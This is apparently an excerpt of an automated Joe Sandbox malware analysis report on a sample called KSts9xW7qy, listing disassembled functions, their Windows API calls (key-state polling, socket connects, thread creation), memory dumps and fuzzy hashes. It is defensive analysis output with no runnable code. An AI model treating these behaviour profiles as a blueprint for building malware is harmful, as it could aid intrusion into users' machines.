                                                                        • Opcode Fuzzy Hash: 1c6f7a8839da6a3771f9cf08a59fce9872df0c45adf571db1160ad151b5feec7
                                                                        • Instruction Fuzzy Hash: 76515D71208204AFD704EF64CC81E6AB7F9FF88304F14981EF699A72A1DB31E905DB52
                                                                        Function 00EDCCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f7f0a9caa9fa0f8288c806d69a617c96a5cdd029d64d92ef9c1264f7c28e719
                                                                        • Instruction ID: 5179c3a2d8ea2c41dd3cf6ca0db30bb2b194e904f4e260b40d05b1386cc02b74
                                                                        • Opcode Fuzzy Hash: 6f7f0a9caa9fa0f8288c806d69a617c96a5cdd029d64d92ef9c1264f7c28e719
                                                                        • Instruction Fuzzy Hash: F841A279904106AFC710DF688C44FB9BF66EB493A4F252226E95AF73D1C630AD42D650
                                                                        Function 00EC1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EC12B4
                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EC12DD
                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EC131C
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EC1341
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EC1349
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1389676194-0
                                                                        • Opcode ID: 96b4069f0311ec564dd55be516dd0b5c4cf327586005d490bb72998b33e5f82e
                                                                        • Instruction ID: 513b7f9229e2892f78bd25ce9f4499aacb90243865dc0795f6f4f9d116fce5d1
                                                                        • Opcode Fuzzy Hash: 96b4069f0311ec564dd55be516dd0b5c4cf327586005d490bb72998b33e5f82e
                                                                        • Instruction Fuzzy Hash: 8141F635A00505EFDB05EF64C981AAEBBF5EF49314B149099E90ABB3A2CB31ED11DB50
                                                                        Function 00E8B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(000000FF), ref: 00E8B64F
                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00E8B66C
                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00E8B691
                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00E8B69F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: df69cc26c98168db00c4641a14019a8ac2864021f2f11fdefe7ef259f3f8fff8
                                                                        • Instruction ID: 5be7022b1a43b3362130bdd433c0ac8b2239de477ac819fbf219377bcae8d6ed
                                                                        • Opcode Fuzzy Hash: df69cc26c98168db00c4641a14019a8ac2864021f2f11fdefe7ef259f3f8fff8
                                                                        • Instruction Fuzzy Hash: 68417B31608109BFCF159F65CC44AE9BBB5FB05324F20535AE829B6290DB30A994EFA1
                                                                        Function 00EAB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00EAB369
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00EAB413
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EAB41B
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00EAB429
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EAB431
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: 00fcba35c78b30f70a1e82c57ad4caf1a56bf3d03cbdc76773028aeb4861baec
                                                                        • Instruction ID: b4772d5ee5787fb88eb66648e1b3d643ebdb50f5d36adf253cef32aae16ae8e4
                                                                        • Opcode Fuzzy Hash: 00fcba35c78b30f70a1e82c57ad4caf1a56bf3d03cbdc76773028aeb4861baec
                                                                        • Instruction Fuzzy Hash: 4C31B171900219EFDF04CF68DD49AAE3BB5EB49329F104225F821EA1D2C7B0A918DB50
                                                                        Function 00EADBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00EADBD7
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EADBF4
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EADC2C
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EADC52
                                                                        • _wcsstr.LIBCMT ref: 00EADC5C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        • Opcode ID: 5faf5d3ffe9222d96eefd5ce7f3ae6915c040fe138fe6a3202e9330dc948d0fe
                                                                        • Instruction ID: 0c0e4bc4217dfb60f768af4735b5d1a73332bfb2c3dd0c79d985eb9b2da52e44
                                                                        • Opcode Fuzzy Hash: 5faf5d3ffe9222d96eefd5ce7f3ae6915c040fe138fe6a3202e9330dc948d0fe
                                                                        • Instruction Fuzzy Hash: 0921F871208104BFEB155B259C49E7BBBA9DF4A760F115029F80AEE151EAA1DC01D260
                                                                        Function 00EDDE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EDDEB0
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EDDED4
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EDDEEC
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00EDDF14
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00EC3A1E,00000000), ref: 00EDDF32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        • Opcode ID: 9e33730f9436ed0c73fb5b21c5175c3cdaf14d88d3cd02a17a2cb61969b12570
                                                                        • Instruction ID: 66c7419930892e4aabd80188850899b199a90ccb54a9567d7c17f5e7fe13524b
                                                                        • Opcode Fuzzy Hash: 9e33730f9436ed0c73fb5b21c5175c3cdaf14d88d3cd02a17a2cb61969b12570
                                                                        • Instruction Fuzzy Hash: C321F531A18216AFCB204F79CC44B6A3B95FB55338F151726FD36EA2E0D7309852DB80
                                                                        Function 00EABC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EABC90
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EABCC2
                                                                        • __itow.LIBCMT ref: 00EABCDA
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EABD00
                                                                        • __itow.LIBCMT ref: 00EABD11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 55807e04640057130fb9ae83919a3d33ee3b575af8c16b03b4ae95352ba6f9f2
                                                                        • Instruction ID: b3d0a7a53b034901c2a67c09cbf5c81bf2b797411fb78c720fe43ba8df15467b
                                                                        • Opcode Fuzzy Hash: 55807e04640057130fb9ae83919a3d33ee3b575af8c16b03b4ae95352ba6f9f2
                                                                        • Instruction Fuzzy Hash: 6B21D8357007187BDB10AE658C46FDE7BA9AF8E724F016064F90AFF182DB70E90597A1
                                                                        Function 00EB6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E750E6: _wcsncpy.LIBCMT ref: 00E750FA
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00EB60C3), ref: 00EB6369
                                                                        • GetLastError.KERNEL32(?,?,?,00EB60C3), ref: 00EB6374
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00EB60C3), ref: 00EB6388
                                                                        • _wcsrchr.LIBCMT ref: 00EB63AA
                                                                          • Part of subcall function 00EB6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00EB60C3), ref: 00EB63E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                        • String ID:
                                                                        • API String ID: 3633006590-0
                                                                        • Opcode ID: 4da4e8a586378a1f24a6fcffba2d14e75364a748edc61f269a9539cb58926152
                                                                        • Instruction ID: 1653857329453d468719f2ebad71b6a4b08891608c117f70b73b9a1a7d57f9e2
                                                                        • Opcode Fuzzy Hash: 4da4e8a586378a1f24a6fcffba2d14e75364a748edc61f269a9539cb58926152
                                                                        • Instruction Fuzzy Hash: 0F21D8315042159ADF15BB78AC46FFF23ECAF59364F102465F049F70D0EB68D9848A64
                                                                        Function 00EC8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00ECA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00ECA84E
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EC8BD3
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8BE2
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00EC8BFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 3701255441-0
                                                                        • Opcode ID: 5543e8d3f59422b12d101662b4ca09a12efa0afda30e99938027d3dd5ee2b08e
                                                                        • Instruction ID: 8f47695233540988db1714e8a775afdfca619444ad96687ca476184fab3c7a53
                                                                        • Opcode Fuzzy Hash: 5543e8d3f59422b12d101662b4ca09a12efa0afda30e99938027d3dd5ee2b08e
                                                                        • Instruction Fuzzy Hash: 2B219F312041149FCB10AB68CE45FBEB7E9AF84714F04545DF946BB3D2CB70AC068751
                                                                        Function 00EC8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 00EC8441
                                                                        • GetForegroundWindow.USER32 ref: 00EC8458
                                                                        • GetDC.USER32(00000000), ref: 00EC8494
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00EC84A0
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00EC84DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 103b7a4f2a7fe83b356bef5bb1a6bf3809d2ad709907d0c1a3a3e390fdef78ba
                                                                        • Instruction ID: d3927c5f1c98f46bea4da0918cf040bb55dcac48c52962b89a35d175abb7c48d
                                                                        • Opcode Fuzzy Hash: 103b7a4f2a7fe83b356bef5bb1a6bf3809d2ad709907d0c1a3a3e390fdef78ba
                                                                        • Instruction Fuzzy Hash: 9D218475A00204AFD714EFA5CD45AAEBBF9FF88301F148479E959E7251DB70AC05CB50
                                                                        Function 00E8AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E8AFE3
                                                                        • SelectObject.GDI32(?,00000000), ref: 00E8AFF2
                                                                        • BeginPath.GDI32(?), ref: 00E8B009
                                                                        • SelectObject.GDI32(?,00000000), ref: 00E8B033
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: 1b1d2085bead208d726aae0fab3e697231d303854a12c64e1b1088d2b66774d1
                                                                        • Instruction ID: 001fd101f9ef30f2a8b62262ff5f78128d37ccbf027ce9cbf18ca32cb91c4ecd
                                                                        • Opcode Fuzzy Hash: 1b1d2085bead208d726aae0fab3e697231d303854a12c64e1b1088d2b66774d1
                                                                        • Instruction Fuzzy Hash: 8821C57090034DEFDB11EF95ED497AA7B6AB750369F18532AF428B21A0C3705855EFA0
                                                                        Function 00E9217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __calloc_crt.LIBCMT ref: 00E921A9
                                                                        • CreateThread.KERNEL32(?,?,00E922DF,00000000,?,?), ref: 00E921ED
                                                                        • GetLastError.KERNEL32 ref: 00E921F7
                                                                        • _free.LIBCMT ref: 00E92200
                                                                        • __dosmaperr.LIBCMT ref: 00E9220B
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 2664167353-0
                                                                        • Opcode ID: 18ae26b7dead094bda08f73b1b4fa3509a107f484d1d4d29ac59281e7afff515
                                                                        • Instruction ID: caa9a73f3c0a25553bdbea4d0d88f3e55106d0923e5b32def1f16fed08dc0a44
                                                                        • Opcode Fuzzy Hash: 18ae26b7dead094bda08f73b1b4fa3509a107f484d1d4d29ac59281e7afff515
                                                                        • Instruction Fuzzy Hash: DE114432109306BFDF10AFA5DC41DAB3BE9EF41774B10102DFA14B6092EB71C81196A0
                                                                        Function 00EAABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EAABD7
                                                                        • GetLastError.KERNEL32(?,00EAA69F,?,?,?), ref: 00EAABE1
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00EAA69F,?,?,?), ref: 00EAABF0
                                                                        • HeapAlloc.KERNEL32(00000000,?,00EAA69F,?,?,?), ref: 00EAABF7
                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EAAC0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        • Opcode ID: 518a9954fc995d804bb2653729447621ea64cc424dd95fe400f913d6ed818f0f
                                                                        • Instruction ID: 7f33faa4474716b8c61a4eace33d621dc9134eb0161e51c56010b3b5863970e6
                                                                        • Opcode Fuzzy Hash: 518a9954fc995d804bb2653729447621ea64cc424dd95fe400f913d6ed818f0f
                                                                        • Instruction Fuzzy Hash: B0016970205204BFEB104FAADC48DBB7FAEEF8A3687140429F909E7260DB719C44CB61
                                                                        Function 00EA9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32 ref: 00EA9ADC
                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00EA9AF7
                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00EA9B05
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EA9B15
                                                                        • CLSIDFromString.OLE32(?,?), ref: 00EA9B21
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: dc711b55b50a96fb1523a2fb7f8aa8b3c9fb69aa492fde44454741e7fdcd8cfb
                                                                        • Instruction ID: 45bd04985aab8ee697d6d5af7e4e0728a7e4db0d5f17d5b53d40419972492764
                                                                        • Opcode Fuzzy Hash: dc711b55b50a96fb1523a2fb7f8aa8b3c9fb69aa492fde44454741e7fdcd8cfb
                                                                        • Instruction Fuzzy Hash: 46018F76600204BFDB144F55EC44BAA7EEEEF89392F244024F905F6211D770ED049BB0
                                                                        Function 00EB7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7A74
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EB7A82
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7A8A
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EB7A94
                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
